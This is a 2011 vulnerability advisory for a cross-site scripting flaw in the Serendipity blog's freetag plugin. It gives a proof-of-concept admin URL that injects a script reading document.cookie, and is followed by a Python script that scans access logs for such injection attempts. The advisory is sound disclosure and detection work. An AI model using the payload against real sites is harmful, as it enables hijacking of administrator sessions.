- Advisory: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
- Advisory ID: SSCHADV2011-016
- Author: h4(k3r
- Affected Software: Successfully tested on Serendipity 1.5.5
- Vendor URL: http://h4ck3r.ze-forum.com
- Vendor Status: fixed
- CVE-ID: -
- ==========================
- Vulnerability Description:
- ==========================
- The freetag plugin parameter "serendipity[tagview]" in the Serendipity backend is prone to a Cross-Site Scripting vulnerability.
- ==================
- Technical Details:
- ==================
- http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script>
- =========
- Solution:
- =========
- Update to the latest version
- ====================
- Disclosure Timeline:
- ====================
- 22-Sep-2011 - informed developers
- 23-Sep-2011 - fixed in the latest version
- 25-Sep-2011 - release date of this security advisory
- 25-Sep-2011 - post on BugTraq
- ========
- Credits:
- ========
- Vulnerability found and advisory written by Stefan Schurtz.
- ===========
- References:
- ===========
- http://h4ck3r.ze-forum.com
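One way to check web-server access logs for requests that put markup into the "serendipity[tagview]" parameter described under Technical Details. This is an added example, not part of the original advisory or of Serendipity; it assumes common/combined log format, and the sample log lines, client addresses and benign tag values are constructed.

```python
import re
from urllib.parse import parse_qsl

# Parameter name taken from the advisory's request URL.
PARAM = "serendipity[tagview]"
# Characters needed to break out of HTML text or attribute context.
MARKUP = re.compile(r"[<>\"']")
# Assumption: common/combined log format with a quoted request field.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample input; the path and query layout follow the advisory.
ADMIN = ("/serendipity/serendipity_admin?serendipity%5BadminModule%5D=event_display"
         "&serendipity%5BadminAction%5D=managetags")
SAMPLE_LOG = [
    f'192.0.2.10 - - [25/Sep/2011:10:01:02 +0000] "GET {ADMIN}'
    '&serendipity%5Btagview%5D=example HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [25/Sep/2011:10:03:40 +0000] "GET {ADMIN}'
    '&serendipity%5Btagview%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E'
    ' HTTP/1.1" 200 5188',
    '192.0.2.10 - - [25/Sep/2011:10:05:11 +0000] "GET /serendipity/serendipity_admin'
    '?serendipity[adminAction]=managetags&serendipity[tagview]=php-security'
    ' HTTP/1.1" 200 5090',
    '203.0.113.5 - - [25/Sep/2011:10:06:00 +0000] "-" 408 0',  # no request line
]

def tagview_values(log_line):
    """Return the decoded serendipity[tagview] values found in one log line."""
    match = REQUEST.search(log_line)
    if match is None:
        return []
    query = match.group(1).partition("?")[2]
    # parse_qsl percent-decodes names and values once, as the server would.
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == PARAM]

def find_injection_attempts(lines):
    """Return (line_number, client, value) for tagview values carrying markup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for value in tagview_values(line):
            if MARKUP.search(value):
                hits.append((number, line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for number, client, value in find_injection_attempts(SAMPLE_LOG):
        print(f"line {number}: {client} sent {PARAM}={value!r}")
```

A hit only shows that such a request was received; whether it executed depends on whether the installation had already been updated as the Solution section advises.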